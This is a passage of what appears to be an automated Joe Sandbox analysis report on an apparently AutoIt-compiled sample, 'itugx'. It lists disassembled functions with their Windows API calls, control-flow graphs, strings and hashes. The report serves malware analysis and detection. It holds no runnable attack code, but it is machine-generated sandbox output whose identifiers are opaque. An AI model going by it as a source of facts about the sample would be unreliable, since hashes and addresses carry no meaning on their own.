                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00313646
                                                    • LoadIconW.USER32(000000A9), ref: 0031365C
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0031366B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: b3e046370aef65c31410bb12f3c46a781b91b3f189c6ef6ae76f3b27f50ce07c
                                                    • Instruction ID: e71c704adf652e1be733a14b5f3af24faeae39db1da9808513ea1cc9feab57a7
                                                    • Opcode Fuzzy Hash: b3e046370aef65c31410bb12f3c46a781b91b3f189c6ef6ae76f3b27f50ce07c
                                                    • Instruction Fuzzy Hash: B421E3B5901258AFDF12DFA4E889BDEBBBCFB09700F00521AF512AA2A0D7B54555CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003509FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 730 3509fb-350a2b call 3507cf 733 350a46-350a52 call 3455b1 730->733 734 350a2d-350a38 call 33f656 730->734 740 350a54-350a69 call 33f656 call 33f669 733->740 741 350a6b-350ab4 call 35073a 733->741 739 350a3a-350a41 call 33f669 734->739 750 350d1d-350d23 739->750 740->739 748 350ab6-350abf 741->748 749 350b21-350b2a GetFileType 741->749 752 350af6-350b1c GetLastError call 33f633 748->752 753 350ac1-350ac5 748->753 754 350b73-350b76 749->754 755 350b2c-350b5d GetLastError call 33f633 CloseHandle 749->755 752->739 753->752 759 350ac7-350af4 call 35073a 753->759 757 350b7f-350b85 754->757 758 350b78-350b7d 754->758 755->739 769 350b63-350b6e call 33f669 755->769 762 350b89-350bd7 call 3454fa 757->762 763 350b87 757->763 758->762 759->749 759->752 772 350be7-350c0b call 3504ed 762->772 773 350bd9-350be5 call 35094b 762->773 763->762 769->739 780 350c0d 772->780 781 350c1e-350c61 772->781 773->772 779 350c0f-350c19 call 348a3e 773->779 779->750 780->779 782 350c63-350c67 781->782 783 350c82-350c90 781->783 782->783 785 350c69-350c7d 782->785 786 350c96-350c9a 783->786 787 350d1b 783->787 785->783 786->787 789 350c9c-350ccf CloseHandle call 35073a 786->789 787->750 792 350cd1-350cfd GetLastError call 33f633 call 3456c3 789->792 793 350d03-350d17 789->793 792->793 793->787
                                                    APIs
                                                      • Part of subcall function 0035073A: CreateFileW.KERNELBASE(00000000,00000000,?,00350AA4,?,?,00000000,?,00350AA4,00000000,0000000C), ref: 00350757
                                                    • GetLastError.KERNEL32 ref: 00350B0F
                                                    • __dosmaperr.LIBCMT ref: 00350B16
                                                    • GetFileType.KERNELBASE(00000000), ref: 00350B22
                                                    • GetLastError.KERNEL32 ref: 00350B2C
                                                    • __dosmaperr.LIBCMT ref: 00350B35
                                                    • CloseHandle.KERNEL32(00000000), ref: 00350B55
                                                    • CloseHandle.KERNEL32(?), ref: 00350C9F
                                                    • GetLastError.KERNEL32 ref: 00350CD1
                                                    • __dosmaperr.LIBCMT ref: 00350CD8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                    • String ID: H
                                                    • API String ID: 4237864984-2852464175
                                                    • Opcode ID: 3547fa2b7620e084e7a0d079bca0ab51fb767d8d03ed0cdd4da2e05502bbf353
                                                    • Instruction ID: 7c7d5acc1f1f567193522310b090f2b43509ebbd444ca2747b38cf92e484ff0a
                                                    • Opcode Fuzzy Hash: 3547fa2b7620e084e7a0d079bca0ab51fb767d8d03ed0cdd4da2e05502bbf353
                                                    • Instruction Fuzzy Hash: 41A13732A001448FDF2E9F78D892BAE7BA4AB06325F140259FC119F3E1D7329906CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0031551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00315539
                                                      • Part of subcall function 003151BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003151E1
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0031534B
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00354BD7
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00354C18
                                                    • RegCloseKey.ADVAPI32(?), ref: 00354C5A
                                                    • _wcslen.LIBCMT ref: 00354CC1
                                                    • _wcslen.LIBCMT ref: 00354CD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 98802146-2727554177
                                                    • Opcode ID: 4eee65a1d4e0e133ab2d81738737e0154fcc8d74d09da283215279b7a0371ad4
                                                    • Instruction ID: 82f609a3582cc151e49c9357dd086ecc7f3bb411c7fce558474115dfa752d72c
                                                    • Opcode Fuzzy Hash: 4eee65a1d4e0e133ab2d81738737e0154fcc8d74d09da283215279b7a0371ad4
                                                    • Instruction Fuzzy Hash: 9D716C75505340AEC32AEF65D885DABBBECFF99340F40052EF4458B1A1EB709A89CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00313465
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00313474
                                                    • LoadIconW.USER32(00000063), ref: 0031348A
                                                    • LoadIconW.USER32(000000A4), ref: 0031349C
                                                    • LoadIconW.USER32(000000A2), ref: 003134AE
                                                    • LoadImageW.USER32 ref: 003134C6
                                                    • RegisterClassExW.USER32 ref: 00313517
                                                      • Part of subcall function 003135AB: GetSysColorBrush.USER32(0000000F), ref: 003135DE
                                                      • Part of subcall function 003135AB: RegisterClassExW.USER32 ref: 00313608
                                                      • Part of subcall function 003135AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00313619
                                                      • Part of subcall function 003135AB: InitCommonControlsEx.COMCTL32(?), ref: 00313636
                                                      • Part of subcall function 003135AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00313646
                                                      • Part of subcall function 003135AB: LoadIconW.USER32(000000A9), ref: 0031365C
                                                      • Part of subcall function 003135AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0031366B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: a72421ccab094fe1e679e092b35c263859da083ae1b09dce08341a5f6e87af31
                                                    • Instruction ID: 91e83a197b66cd673d087285f51eca9503577f83f0b979e4faa93ed87ba72c50
                                                    • Opcode Fuzzy Hash: a72421ccab094fe1e679e092b35c263859da083ae1b09dce08341a5f6e87af31
                                                    • Instruction Fuzzy Hash: 5C214178D40358AFDB269F95EC85A9A7FBCFB08B50F00011AE505AA2A0C7B945458F90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031CA50 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0031CE8E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: p3>$p3>$p3>$p3>$p5>$p5>$x3>$x3>
                                                    • API String ID: 1385522511-2464186938
                                                    • Opcode ID: 9a15a3d43e25a29e7d828bbf82fa420c7f3641f51206b25142cc1225135baacb
                                                    • Instruction ID: aab0a2bd094e2a466a3eacc8afbfc1fe2259984fdd9eb16c59e7bbdf60e0523a
                                                    • Opcode Fuzzy Hash: 9a15a3d43e25a29e7d828bbf82fa420c7f3641f51206b25142cc1225135baacb
                                                    • Instruction Fuzzy Hash: B232E275A442059FCB2ACF58C885EFAB7B9FF48310F19D059E906AB291C774ED81CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00313AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1078 313aa3-313ac6 1079 354139-35414c call 37a12a 1078->1079 1080 313acc-313b35 call 33019b call 317953 call 31bf07 call 317953 * 2 call 316e52 1078->1080 1086 354153-35415b 1079->1086 1114 313b3b-313b48 call 316cce call 316b12 1080->1114 1115 35456b-35457b call 37a12a 1080->1115 1088 35415d-354165 1086->1088 1089 35416b-354173 1086->1089 1088->1089 1091 313b64-313bd3 call 31bf07 call 313a70 call 31bf07 call 31557e call 3141c9 call 316bfa 1088->1091 1092 354175-35417c 1089->1092 1093 35417e-354186 1089->1093 1128 3541b4-3541bf 1091->1128 1129 313bd9-313c48 call 31bf07 * 2 call 31694e call 317af4 SetCurrentDirectoryW call 31bd2c * 2 call 33019b call 3141a6 1091->1129 1096 3541a6-3541af call 37d4bf 1092->1096 1097 354191-354199 1093->1097 1098 354188-35418f 1093->1098 1096->1091 1097->1091 1102 35419f-3541a1 1097->1102 1098->1096 1102->1096 1125 313b4d-313b5e call 316afb 1114->1125 1120 354580 1115->1120 1120->1120 1125->1086 1125->1091 1128->1129 1131 3541c5-3541f8 call 317953 call 31636d 1128->1131 1175 313c4c-313c51 1129->1175 1141 354502-354519 call 37a12a 1131->1141 1142 3541fe-354225 call 3835cd call 3163db 1131->1142 1150 313da5-313df0 call 31bd2c * 2 call 317953 call 31bd2c call 317953 call 3301a4 1141->1150 1142->1141 1157 35422b-3542a7 call 33016b call 31bc23 call 31bb3d 1142->1157 1177 3542ad-3542cf call 31bc23 1157->1177 1178 35446f-3544ab call 31bc23 call 3813a0 call 374a0c call 334d0e 1157->1178 1179 313d71-313d92 call 317953 SetCurrentDirectoryW 1175->1179 1180 313c57-313c64 call 31ad74 1175->1180 1192 3542e5-3542f0 call 3814a6 1177->1192 1193 3542d1-3542e0 1177->1193 1225 3544ad-3544d2 call 315c10 call 3301a4 call 381388 1178->1225 1179->1150 1195 313d94-313da2 call 33015d call 3301a4 1179->1195 1180->1179 1194 313c6a-313c86 call 314093 call 313ff3 1180->1194 1210 3542f2-354308 1192->1210 1211 35430d-354318 call 381492 1192->1211 1199 354401-354414 call 31bb3d 1193->1199 1223 35454e-354566 call 37a12a 1194->1223 1224 313c8c-313ca3 call 313fb8 call 334cf3 1194->1224 1195->1150 1199->1177 1215 35441a-354424 1199->1215 1210->1199 1228 35432e-354339 call 32e607 1211->1228 1229 35431a-354329 1211->1229 1220 354457 call 37a486 1215->1220 1221 354426-354434 1215->1221 1234 35445c-354469 1220->1234 1221->1220 1226 354436-354455 call 3140e0 1221->1226 1223->1179 1246 313ca5-313cc0 call 336755 1224->1246 1247 313cc6-313cc9 1224->1247 1225->1150 1226->1234 1228->1199 1242 35433f-35435b call 379f0d 1228->1242 1229->1199 1234->1177 1234->1178 1254 35435d-354388 call 31b25f call 31bd2c 1242->1254 1255 35438a-35438d 1242->1255 1246->1247 1251 313df3-313df9 1246->1251 1247->1251 1252 313ccf-313cd4 1247->1252 1251->1252 1260 313dff-35452a 1251->1260 1257 35452f-354537 call 379dd5 1252->1257 1258 313cda-313d13 call 31b25f call 313e15 1252->1258 1303 3543b6-3543c7 call 31bc23 1254->1303 1264 35438f-3543b5 call 31b25f call 317d27 call 31bd2c 1255->1264 1265 3543c9-3543cc 1255->1265 1279 35453c-35453f 1257->1279 1288 313d30-313d32 1258->1288 1289 313d15-313d2c call 3301a4 call 33015d 1258->1289 1260->1252 1264->1303 1268 3543ed-3543f1 call 38142e 1265->1268 1269 3543ce-3543d7 call 379e3c 1265->1269 1281 3543f6-354400 call 3301a4 1268->1281 1284 3544d7-354500 call 37a12a call 3301a4 call 334d0e 1269->1284 1285 3543dd-3543e8 call 3301a4 1269->1285 1286 354545-354549 1279->1286 1287 313e08-313e10 1279->1287 1281->1199 1284->1225 1285->1177 1286->1287 1292 313d5e-313d6b 1287->1292 1295 313e04 1288->1295 1296 313d38-313d3b 1288->1296 1289->1288 1292->1175 1292->1179 1295->1287 1296->1287 1302 313d41-313d44 1296->1302 1302->1279 1308 313d4a-313d59 call 3140e0 1302->1308 1303->1281 1308->1292
                                                    APIs
                                                      • Part of subcall function 00317953: FindCloseChangeNotification.KERNELBASE(?,?,00000000,00353A1C), ref: 00317973
                                                      • Part of subcall function 00316E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00313B33,?,00008000), ref: 00316E80
                                                    • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00313C17
                                                    • _wcslen.LIBCMT ref: 00313C96
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00313D81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 2701412040-3738523708
                                                    • Opcode ID: d4fb48d0e357a8deb6480c4c842b402c0993035b2149338a477c9dee96425b87
                                                    • Instruction ID: ac5281e3b1b4358d057b45585bb3ee3f41818208071bfce6653bad153b892d89
                                                    • Opcode Fuzzy Hash: d4fb48d0e357a8deb6480c4c842b402c0993035b2149338a477c9dee96425b87
                                                    • Instruction Fuzzy Hash: E622B1715083409FC71AEF24D881AEFBBE5BF99314F04491DF4859B2A1DB70DA89CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00312735 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 153comCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00313236
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0031323E
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00313249
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00313254
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0031325C
                                                      • Part of subcall function 00313205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00313264
                                                      • Part of subcall function 0031318C: RegisterWindowMessageW.USER32(00000004,?,00312906), ref: 003131E4
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003129AC
                                                    • OleInitialize.OLE32 ref: 003129CA
                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 003539E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: (&>$(s$0$>$0e$@(>$$>
                                                    • API String ID: 1986988660-52693568
                                                    • Opcode ID: 5064a07444b9f551c220d06f8f94c86ba00f242fa7a0a94e772e300e1b04fe9b
                                                    • Instruction ID: 1b89f718422f592875f1d87c5116ab39de6f187a7391fc35ed312d3f787cae4b
                                                    • Opcode Fuzzy Hash: 5064a07444b9f551c220d06f8f94c86ba00f242fa7a0a94e772e300e1b04fe9b
                                                    • Instruction Fuzzy Hash: 5A7192B49012848EC7ABDF2AEEA5A57BAECF74A304B40432ED419CF2E1EB705445CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031F680 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D5>$D5>$D5>$D5>$D5>D5>$Variable must be of type 'Object'.
                                                    • API String ID: 0-54505318
                                                    • Opcode ID: fdc5c9a97cbfc4cee17a89c8bf86f9e70b81260219f92cabbded836856d2d8a8
                                                    • Instruction ID: 8f6432fa4f02cea7835129515409c7e8b571ba23968914b69c4d49eb5ce88e47
                                                    • Opcode Fuzzy Hash: fdc5c9a97cbfc4cee17a89c8bf86f9e70b81260219f92cabbded836856d2d8a8
                                                    • Instruction Fuzzy Hash: 9FC28C75E00215DFCB2ACF98C890BADB7B5FF09310F258169E945AB3A1D375AD81CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003202F0 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 003215A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: D5>$D5>$D5>$D5>$D5>D5>
                                                    • API String ID: 1385522511-3302898000
                                                    • Opcode ID: e837dcf2c78ee81a41479f78a49feb3d2f40f67d10032fcd8f0640b829684ba7
                                                    • Instruction ID: 572db66057045fab11d2692538ebe59862a2e1039407b450824731bab1ea4a0e
                                                    • Opcode Fuzzy Hash: e837dcf2c78ee81a41479f78a49feb3d2f40f67d10032fcd8f0640b829684ba7
                                                    • Instruction Fuzzy Hash: 0DB2A074A08360CFC72ACF18D480A2AB7E5BF99700F25895DE9859B392D731ED45CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00312A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2327 312a52-312a8b 2328 312a91-312aa7 mciSendStringW 2327->2328 2329 3539f4-3539f5 DestroyWindow 2327->2329 2330 312d08-312d15 2328->2330 2331 312aad-312ab5 2328->2331 2332 353a00-353a0d 2329->2332 2334 312d17-312d32 UnregisterHotKey 2330->2334 2335 312d3a-312d41 2330->2335 2331->2332 2333 312abb-312aca call 312e70 2331->2333 2337 353a3c-353a43 2332->2337 2338 353a0f-353a12 2332->2338 2348 312ad0-312ad8 2333->2348 2349 353a4a-353a56 2333->2349 2334->2335 2340 312d34-312d35 call 312712 2334->2340 2335->2331 2336 312d47 2335->2336 2336->2330 2337->2332 2341 353a45 2337->2341 2342 353a14-353a1c call 317953 2338->2342 2343 353a1e-353a21 FindClose 2338->2343 2340->2335 2341->2349 2347 353a27-353a34 2342->2347 2343->2347 2347->2337 2353 353a36-353a37 call 383c0b 2347->2353 2354 353a6e-353a7b 2348->2354 2355 312ade-312b03 call 31e650 2348->2355 2350 353a60-353a67 2349->2350 2351 353a58-353a5a FreeLibrary 2349->2351 2350->2349 2358 353a69 2350->2358 2351->2350 2353->2337 2359 353aa2-353aa9 2354->2359 2360 353a7d-353a9a VirtualFree 2354->2360 2364 312b05 2355->2364 2365 312b3a-312b45 OleUninitialize 2355->2365 2358->2354 2359->2354 2363 353aab 2359->2363 2360->2359 2362 353a9c-353a9d call 383c71 2360->2362 2362->2359 2367 353ab0-353ab4 2363->2367 2368 312b08-312b38 call 313047 call 312ff0 2364->2368 2365->2367 2369 312b4b-312b50 2365->2369 2367->2369 2370 353aba-353ac0 2367->2370 2368->2365 2372 353ac5-353ad2 call 383c45 2369->2372 2373 312b56-312b60 2369->2373 2370->2369 2385 353ad4 2372->2385 2376 312b66-312b71 call 31bd2c 2373->2376 2377 312d49-312d56 call 32fb27 2373->2377 2388 312b77 call 312f86 2376->2388 2377->2376 2387 312d5c 2377->2387 2389 353ad9-353afb call 33015d 2385->2389 2387->2377 2390 312b7c-312be7 call 312e17 call 3301a4 call 312dbe call 31bd2c call 31e650 call 312e40 call 3301a4 2388->2390 2396 353afd 2389->2396 2390->2389 2417 312bed-312c11 call 3301a4 2390->2417 2399 353b02-353b24 call 33015d 2396->2399 2404 353b26 2399->2404 2407 353b2b-353b4d call 33015d 2404->2407 2413 353b4f 2407->2413 2416 353b54-353b61 call 376d63 2413->2416 2423 353b63 2416->2423 2417->2399 2422 312c17-312c3b call 3301a4 2417->2422 2422->2407 2427 312c41-312c5b call 3301a4 2422->2427 2426 353b68-353b75 call 32bd6a 2423->2426 2431 353b77 2426->2431 2427->2416 2433 312c61-312c85 call 312e17 call 3301a4 2427->2433 2434 353b7c-353b89 call 383b9f 2431->2434 2433->2426 2442 312c8b-312c93 2433->2442 2440 353b8b 2434->2440 2443 353b90-353b9d call 383c26 2440->2443 2442->2434 2444 312c99-312caa call 31bd2c call 312f4c 2442->2444 2450 353b9f 2443->2450 2451 312caf-312cb7 2444->2451 2453 353ba4-353bb1 call 383c26 2450->2453 2451->2443 2452 312cbd-312ccb 2451->2452 2452->2453 2454 312cd1-312d07 call 31bd2c * 3 call 312eb8 2452->2454 2459 353bb3 2453->2459 2459->2459
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00312A9B
                                                    • OleUninitialize.OLE32(?,00000000), ref: 00312B3A
                                                    • UnregisterHotKey.USER32(?), ref: 00312D1F
                                                    • DestroyWindow.USER32(?), ref: 003539F5
                                                    • FreeLibrary.KERNEL32(?), ref: 00353A5A
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00353A87
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
